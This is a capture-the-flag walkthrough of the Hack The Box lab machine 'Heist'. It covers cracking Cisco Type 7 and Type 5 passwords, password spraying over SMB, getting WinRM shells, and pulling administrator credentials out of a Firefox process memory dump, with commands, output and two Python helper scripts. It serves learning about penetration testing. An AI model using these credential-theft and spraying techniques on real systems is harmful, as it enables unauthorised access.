# Hack the Box - Heist Walk-through

This blog is related to Computer Security and Ethical hacking and does not promote hacking, cracking, software piracy or any kind of illegal activities. The blog is for informational and educational purpose and for those willing to learn about ethical hacking and penetration testing.

You shall not misuse the information to gain unauthorized access. Performing hack attempts (without permission) on computers that you do not own is illegal.

# Hola Gente!

Today we are going to go over the steps I followed to get root on Heist, a machine on [Hack the Box](http://hacktheboxltd.sjv.io/21oZxQ). Hack The Box is an online platform allowing you to test and advance your skills in cyber security.

### Scanning and Enumeration

I kicked off my analysis by conducting a comprehensive scan of the target system using nmap default scripts:

```bash
TGT=10.129.96.157
nmap -sSVC -n -oA nmap $TGT
```

**Key findings**:

* Port 80: HTTP running Microsoft IIS 10.0.
* Port 135: MSRPC.
* Port 445: Microsoft SMB service.

Visiting the web server on port 80 revealed a "Support Login Page" with an option to log in as a guest:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1732671008349/8cea4529-aba2-45c2-848f-915ce3586a2e.png align="center")

Logging in provided access to download a Cisco configuration file containing encrypted passwords.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1732671045575/d2d3778e-3df5-48a3-b08c-d4ee6ba33fcf.png align="center")

Extract of the config file:

```bash
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
```

#### Decrypting Passwords

The configuration file included encrypted credentials:

* User `rout3r`: Cisco Type 7 password.
* `enable secret`: Cisco Type 5 hash.

Using an online [Cisco Type 7 decryption](https://www.firewall.cx/cisco/cisco-routers/cisco-type7-password-crack.html) tool and `hashcat` with the rockyou wordlist, I cracked the credentials:

```bash
hashcat -a 0 -m 500 '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' rockyou.txt -O
```

* `rout3r`: `$uperP@ssword`
* Admin password: `Q4)sJu\Y8qz*A3?d`
* Enable secret: `stealth1agent`
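To show why the Type 7 strings in that config give up their plaintext instantly while the Type 5 hash needs hashcat, here is an added example (my own code, not part of the original post or any Cisco tool) that audits a config excerpt: it decodes every `password 7` line with the fixed-key XOR that Type 7 uses and merely collects `secret 5` hashes for offline cracking. The constant key and the regex patterns are assumptions of this example.

```python
import re

# Well-known constant key used by Cisco's Type 7 scheme (assumed here).
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def type7_decode(encoded: str) -> str:
    """Reverse a Type 7 string: 2-digit decimal key offset, then hex bytes."""
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("malformed Type 7 string")
    offset = int(encoded[:2], 10)
    data = bytes.fromhex(encoded[2:])
    # Each byte was XORed with the key byte at (offset + position) mod key length.
    out = bytes(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)]
                for i, b in enumerate(data))
    return out.decode("ascii")


# 'username X [privilege N] password 7 <hex>' and 'enable secret 5 <md5crypt>'.
TYPE7_RE = re.compile(r"^username\s+(\S+).*?\bpassword\s+7\s+([0-9A-Fa-f]+)")
TYPE5_RE = re.compile(r"^enable secret 5 (\$1\$\S+)")


def audit_config(config: str) -> dict:
    """Return {'type7': {user: plaintext}, 'type5': [hash, ...]} for a config."""
    found = {"type7": {}, "type5": []}
    for line in config.splitlines():
        line = line.strip()
        if m := TYPE7_RE.match(line):
            found["type7"][m.group(1)] = type7_decode(m.group(2))   # reversible
        elif m := TYPE5_RE.match(line):
            found["type5"].append(m.group(1))                        # needs cracking
    return found


# Constructed sample: the relevant lines of the config excerpt shown above.
SAMPLE_CONFIG = """\
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""
```

Running `audit_config(SAMPLE_CONFIG)` reproduces the two Type 7 plaintexts listed above, which is the reason a leaked config with `password 7` lines should be treated as a credential leak.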

#### SMB Enumeration

Armed with the credentials, I tested SMB access using `netexec`:

```bash
netexec smb $TGT -u hazard -p stealth1agent 
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent
```

I then did a little more enumeration with `netexec` and `smbmap`:

```bash
netexec smb $TGT -u hazard -p stealth1agent --shares 
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         10.129.96.157   445    SUPPORTDESK      [*] Enumerated shares
SMB         10.129.96.157   445    SUPPORTDESK      Share           Permissions     Remark
SMB         10.129.96.157   445    SUPPORTDESK      -----           -----------     ------
SMB         10.129.96.157   445    SUPPORTDESK      ADMIN$                          Remote Admin
SMB         10.129.96.157   445    SUPPORTDESK      C$                              Default share
SMB         10.129.96.157   445    SUPPORTDESK      IPC$            READ            Remote IPC
```

```bash
smbmap -u hazard -p stealth1agent -d SupportDesk -H $TGT


[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.129.96.157:445	Name: 10.129.96.157       	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
```

I enumerated shares, noting accessible resources and potential avenues for lateral movement. A brute-force RID enumeration revealed several user accounts, including:

* `Administrator`
* `Guest`
* `Hazard`
* `Chase`

```bash
netexec smb $TGT -u hazard -p stealth1agent --rid-brute      
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         10.129.96.157   445    SUPPORTDESK      500: SUPPORTDESK\Administrator (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      501: SUPPORTDESK\Guest (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      513: SUPPORTDESK\None (SidTypeGroup)
SMB         10.129.96.157   445    SUPPORTDESK      1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1009: SUPPORTDESK\support (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1012: SUPPORTDESK\Chase (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1013: SUPPORTDESK\Jason (SidTypeUser)
```

I created `users.txt` and `passwords.txt` files and ran a password spray using `netexec`:

```bash
netexec smb $TGT -u users.txt -p passwords.txt --continue-on-success
```

And Success! I found valid credentials for user `Chase`:

* Username: `Chase`
* Password: `Q4)sJu\Y8qz*A3?d`

With valid credentials, I confirmed remote access using `netexec winrm`:

```bash
netexec winrm $TGT -u Chase -p "Q4)sJu\Y8qz*A3?d" -X "ipconfig"
```

This granted me WinRM access, allowing me to execute commands on the target.

#### Exploitation

Using `evil-winrm`, I gained an interactive shell and extracted the user flag from the desktop:

```bash
evil-winrm -i $TGT -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'
```

Navigating through the user Desktop, I found and captured the flag. 🎉

## Privilege Escalation

After capturing the user.txt flag and exploring the Desktop, I noticed that there was a todo.txt file:

```bash
PS C:\Users\Chase\Desktop>type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.
```

After a quick run with [winPEAS](https://github.com/peass-ng/PEASS-ng/blob/master/winPEAS/winPEASexe/README.md) I noticed that there was a Firefox Creds DB file accessible.

I tried downloading it, which took me a while because I kept getting a 0-byte file. It turned out that I had to kill the Firefox process before attempting to download. I was finally able to download it.

I started trying to crack it, but I had a hard time finding some missing files that were required to crack the credentials.

It eventually turned out to be a 4 hour rabbit hole as this wasn't the way to escalate privileges.

![The office crying Meme Generator](https://content.imageresizer.com/images/memes/The-office-crying-meme-5.jpg align="center")

Well, back to square one. According to Chase's to-do list, he was supposed to be checking the issues list. Looking at the running processes, the only thing that stood out was Firefox, and there was a good chance he was the one using it.

**Disclaimer**: At this point I had to look for a hint. Forensics isn’t my strongest suit, so I didn’t think about exploring the processes’ memory.

Once I realized this was a potential avenue and learned about ProcDump.exe I uploaded and used it to dump Firefox’s Memory:

```powershell
*Evil-WinRM* PS C:\Users\Chase\Documents> get-process -name firefox

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1063      63   112688     201964       2.52   6440   1 firefox

*Evil-WinRM* PS C:\Users\Chase\Documents> $command = "C:\Users\Chase\Documents\procdump.exe -accepteula"
*Evil-WinRM* PS C:\Users\Chase\Documents> Invoke-Expression $command

*Evil-WinRM* PS C:\Users\Chase\Documents> $command = "C:\Users\Chase\Documents\procdump.exe -ma 6440 firefox.dmp"
*Evil-WinRM* PS C:\Users\Chase\Documents> Invoke-Expression $command
```

I downloaded firefox.dmp to my attacker machine (after several tries, since the transfers kept timing out) for further investigation. The dump was almost 50 MB. At this point I didn't know what I was looking for.

Going back to the /login.php page, I used Burp Proxy to inspect the HTTP request/response messages for a login attempt:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1732673367616/23de5994-e22a-499a-996a-dfa3328b717b.png align="center")

And noticed that the request parameter `login_password` was being passed as a POST parameter.

I then used strings and grep to look for this particular string:

```bash
strings -el firefox.dmp | grep login_password


"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
```
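The reason this works is that a process keeps whatever it handled in clear text until that memory is reused, so a browser that just submitted a login form still holds the URL and its parameters. The following added example (my own code, not from the post) reimplements the `strings -el` plus `grep` step in Python: it extracts UTF-16LE runs from a byte blob and pulls the name=value pairs out of any query string that names the parameter. The dump bytes are a constructed stand-in with a placeholder credential, not the real firefox.dmp.

```python
import re


def utf16le_strings(blob: bytes, min_len: int = 4) -> list[str]:
    """Extract runs of >= min_len printable UTF-16LE chars, like `strings -el`.
    In UTF-16LE every printable ASCII char is followed by a NUL byte."""
    pattern = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    return [m.group().decode("utf-16-le") for m in re.finditer(pattern, blob)]


def find_form_params(blob: bytes, param: str) -> dict[str, str]:
    """Return name=value pairs from any query string that contains `param=`."""
    hits: dict[str, str] = {}
    for s in utf16le_strings(blob):
        if param + "=" not in s:
            continue
        # Keep only the query part if the string is a full URL.
        query = s.split("?", 1)[1] if "?" in s else s
        for pair in query.split("&"):
            if "=" in pair:
                k, v = pair.split("=", 1)
                hits[k] = v
    return hits


# Constructed stand-in for a memory dump: non-printable filler around one
# UTF-16LE URL shaped like the line the post found (placeholder values).
FAKE_DUMP = (
    b"\x00\x7f\x13\x37" * 8
    + ("localhost/login.php?login_username=user@example.test"
       "&login_password=Example-Pass-1&login=").encode("utf-16-le")
    + b"\xff\x00\x00\x01" * 8
)
```

`find_form_params(FAKE_DUMP, "login_password")` returns the username and password from the embedded URL, which is exactly the exposure a defender avoids by not keeping a privileged browser session logged in on a host that lower-privileged users can reach.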

These credentials—`admin@support.htb` and `4dD!5}x/re8]FBuZ`—looked promising!

Armed with the newly discovered credentials, I tested them for WinRM access as the Administrator:

```bash
netexec winrm $TGT -u Administrator -p '4dD!5}x/re8]FBuZ'
WINRM       10.129.96.157   5985   SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
WINRM       10.129.96.157   5985   SUPPORTDESK      [+] SupportDesk\Administrator:4dD!5}x/re8]FBuZ (Pwn3d!)
```

And it worked! I then got a shell and the root flag with Evil-WinRM:

```bash
evil-winrm -i $TGT -u Administrator -p '4dD!5}x/re8]FBuZ'

Evil-WinRM PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1732674219876/6d73d712-2210-4cc3-8e4f-2873ba3f19b6.png align="center")

### Lessons Learned

* Read and analyze all clues carefully (e.g., `todo.txt`).
* Use `get-process` to identify active processes for exploitation.
* Memory dumps often reveal sensitive data (e.g., credentials).
* Avoid rabbit holes (DAH!); reassess your strategy if you get stuck.
* `Evil-WinRM` and `Netexec` are your friends.

## Call to Action!

Thanks for making it this far! If you're enjoying these and haven't joined Hack The Box yet, I invite you to sign up using my [referral link.](http://hacktheboxltd.sjv.io/21oZxQ) Trust me, you'll get hooked! 😊 Until next time!
